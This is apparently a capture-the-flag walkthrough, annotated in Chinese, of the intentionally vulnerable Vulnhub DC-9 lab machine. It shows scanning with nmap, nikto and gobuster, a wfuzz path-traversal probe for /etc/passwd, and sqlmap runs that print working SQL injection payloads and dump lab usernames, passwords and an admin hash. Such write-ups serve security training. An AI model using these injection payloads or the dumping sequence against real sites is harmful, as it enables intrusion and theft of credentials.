DC 9
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:b8:5d:8d 1 60 PCS Systemtechnik GmbH
192.168.56.190 08:00:27:bd:a1:5e 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.190
NMAP扫描
──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.190 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 00:42 EST
Nmap scan report for localhost (192.168.56.190)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:BD:A1:5E (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.54 seconds
NMAP扫描结果表明目标主机有1个开放端口:80(http),ssh显示是filtered状态,会不会有端口knock?
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ curl http://192.168.56.190/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.190 Port 80</address>
</body></html>
页面有链接:用户登录页面
──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ nikto -h http://192.168.56.190
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.190
+ Target Hostname: 192.168.56.190
+ Target Port: 80
+ Start Time: 2023-02-14 00:46:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-02-14 00:47:39 (GMT-5) (60 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
访问welcome.php直接返回:logged in as admin?奇怪,但是即使是admin,也没啥功能,并且在点击manage按钮时页面显示:File does not exist
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ gobuster dir -u http://192.168.56.190 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.190
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/02/14 00:48:37 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/search.php (Status: 200) [Size: 1091]
/index.php (Status: 200) [Size: 917]
/welcome.php (Status: 302) [Size: 0] [--> manage.php]
/results.php (Status: 200) [Size: 1056]
/display.php (Status: 200) [Size: 2961]
/css (Status: 301) [Size: 314] [--> http://192.168.56.190/css/]
/includes (Status: 301) [Size: 319] [--> http://192.168.56.190/includes/]
/logout.php (Status: 302) [Size: 0] [--> manage.php]
/config.php (Status: 200) [Size: 0]
/manage.php (Status: 200) [Size: 1210]
/session.php (Status: 302) [Size: 0] [--> manage.php]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101513 / 1102805 (99.88%)
===============================================================
2023/02/14 00:52:54 Finished
===============================================================
manage.php会不会有本地文件包含漏洞?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ wfuzz -c -u http://192.168.56.190/manage.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 87
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.190/manage.php?FUZZ=../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 0
Processed Requests: 220560
Filtered Requests: 220560
Requests/sec.: 0
没有扫描出来,需要找其他的入口。
经简单测试,search.php页面有SQL注入漏洞
──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5
___
__H__
___ ___[)]_____ ___ ___ {1.6.7#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:05:07 /2023-02-14/
[01:05:08] [INFO] testing connection to the target URL
[01:05:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[01:05:08] [INFO] testing if the target URL content is stable
[01:05:08] [INFO] target URL content is stable
[01:05:08] [INFO] testing if POST parameter 'search' is dynamic
[01:05:08] [INFO] POST parameter 'search' appears to be dynamic
[01:05:08] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[01:05:08] [INFO] testing for SQL injection on POST parameter 'search'
[01:05:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:05:09] [INFO] POST parameter 'search' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Moe")
[01:05:09] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided risk (1) value? [Y/n] y
[01:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[01:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[01:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[01:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[01:05:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[01:05:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[01:05:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[01:05:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[01:05:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:05:16] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[01:05:16] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:05:16] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[01:05:16] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:05:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[01:05:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[01:05:16] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[01:05:16] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[01:05:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[01:05:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[01:05:16] [INFO] testing 'Generic inline queries'
[01:05:16] [INFO] testing 'MySQL inline queries'
[01:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[01:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[01:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[01:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[01:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[01:05:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:05:27] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[01:05:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:05:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:05:27] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:05:27] [INFO] target URL appears to have 6 columns in query
[01:05:27] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 4078=4078-- mhvF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:05:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:05:32] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:05:32] [WARNING] your sqlmap version is outdated
[*] ending @ 01:05:32 /2023-02-14/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.6.7#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:05:37 /2023-02-14/
[01:05:37] [INFO] resuming back-end DBMS 'mysql'
[01:05:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 4078=4078-- mhvF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:05:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:05:37] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
[01:05:37] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:05:37] [WARNING] your sqlmap version is outdated
[*] ending @ 01:05:37 /2023-02-14/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D users --tables
___
__H__
___ ___[(]_____ ___ ___ {1.6.7#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:05:52 /2023-02-14/
[01:05:52] [INFO] resuming back-end DBMS 'mysql'
[01:05:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 4078=4078-- mhvF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:05:52] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
[01:05:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:05:52] [WARNING] your sqlmap version is outdated
[*] ending @ 01:05:52 /2023-02-14/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D users -T UserDetails --columns
___
__H__
___ ___[']_____ ___ ___ {1.6.7#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:06:04 /2023-02-14/
[01:06:04] [INFO] resuming back-end DBMS 'mysql'
[01:06:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 4078=4078-- mhvF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:06:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:06:04] [INFO] fetching columns for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column | Type |
+-----------+-----------------+
| firstname | varchar(30) |
| id | int(6) unsigned |
| lastname | varchar(30) |
| password | varchar(20) |
| reg_date | timestamp |
| username | varchar(30) |
+-----------+-----------------+
[01:06:04] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:06:04] [WARNING] your sqlmap version is outdated
[*] ending @ 01:06:04 /2023-02-14/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D users -T UserDetails -C username,password --dump
___
__H__
___ ___[)]_____ ___ ___ {1.6.7#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:06:19 /2023-02-14/
[01:06:19] [INFO] resuming back-end DBMS 'mysql'
[01:06:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 4078=4078-- mhvF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:06:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:06:19] [INFO] fetching entries of column(s) 'password,username' for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+-----------+---------------+
| username | password |
+-----------+---------------+
| marym | 3kfs86sfd |
| julied | 468sfdfsd2 |
| fredf | 4sfd87sfd1 |
| barneyr | RocksOff |
| tomc | TC&TheBoyz |
| jerrym | B8m#48sd |
| wilmaf | Pebbles |
| bettyr | BamBam01 |
| chandlerb | UrAG0D! |
| joeyt | Passw0rd |
| rachelg | yN72#dsd |
| rossg | ILoveRachel |
| monicag | 3248dsds7s |
| phoebeb | smellycats |
| scoots | YR3BVxxxw87 |
| janitor | Ilovepeepee |
| janitor2 | Hawaii-Five-0 |
+-----------+---------------+
[01:06:20] [INFO] table 'users.UserDetails' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.190/dump/users/UserDetails.csv'
[01:06:20] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:06:20] [WARNING] your sqlmap version is outdated
[*] ending @ 01:06:20 /2023-02-14/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ ssh [email protected]
ssh: connect to host 192.168.56.190 port 22: Connection refused
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D Staff --tables
___
__H__
___ ___[.]_____ ___ ___ {1.6.7#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:07:47 /2023-02-14/
[01:07:47] [INFO] resuming back-end DBMS 'mysql'
[01:07:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 4078=4078-- mhvF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:07:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:07:48] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+
[01:07:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:07:48] [WARNING] your sqlmap version is outdated
[*] ending @ 01:07:48 /2023-02-14/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D Staff -T Users --columns
___
__H__
___ ___["]_____ ___ ___ {1.6.7#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:08:05 /2023-02-14/
[01:08:05] [INFO] resuming back-end DBMS 'mysql'
[01:08:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 4078=4078-- mhvF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:08:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:08:05] [INFO] fetching columns for table 'Users' in database 'Staff'
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column | Type |
+----------+-----------------+
| Password | varchar(255) |
| UserID | int(6) unsigned |
| Username | varchar(255) |
+----------+-----------------+
[01:08:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:08:05] [WARNING] your sqlmap version is outdated
[*] ending @ 01:08:05 /2023-02-14/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D Staff -T Users -C Username,Password --dump
___
__H__
___ ___[,]_____ ___ ___ {1.6.7#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:08:18 /2023-02-14/
[01:08:18] [INFO] resuming back-end DBMS 'mysql'
[01:08:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 4078=4078-- mhvF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:08:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:08:18] [INFO] fetching entries of column(s) 'Password,Username' for table 'Users' in database 'Staff'
[01:08:18] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[01:08:25] [INFO] writing hashes to a temporary file '/tmp/sqlmapyhdt9org9077/sqlmaphashes-qbs4x9tc.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[01:08:28] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[01:08:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[01:08:40] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[01:08:40] [INFO] starting 2 processes
[01:09:05] [INFO] current status: stans... \^C
[01:09:05] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
[01:09:05] [WARNING] no clear password(s) found
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+
[01:09:05] [INFO] table 'Staff.Users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.190/dump/Staff/Users.csv'
[01:09:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:09:05] [WARNING] your sqlmap version is outdated
[*] ending @ 01:09:05 /2023-02-14/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ sqlmap -u http://192.168.56.190/results.php --data='search=mary' --level=5 -D Staff -T Users -C Username,Password --dump
___
__H__
___ ___[.]_____ ___ ___ {1.6.7#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:09:16 /2023-02-14/
[01:09:16] [INFO] resuming back-end DBMS 'mysql'
[01:09:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=mary' AND 4078=4078-- mhvF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=mary' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))DYyy)-- ijOE
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=mary' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626b7071,0x6f686674487456516a4468514a586c715a4a5053475a495a5671696a45466f737158427548684757,0x7171787671),NULL-- -
---
[01:09:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:09:16] [INFO] fetching entries of column(s) 'Password,Username' for table 'Users' in database 'Staff'
[01:09:16] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] N
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+
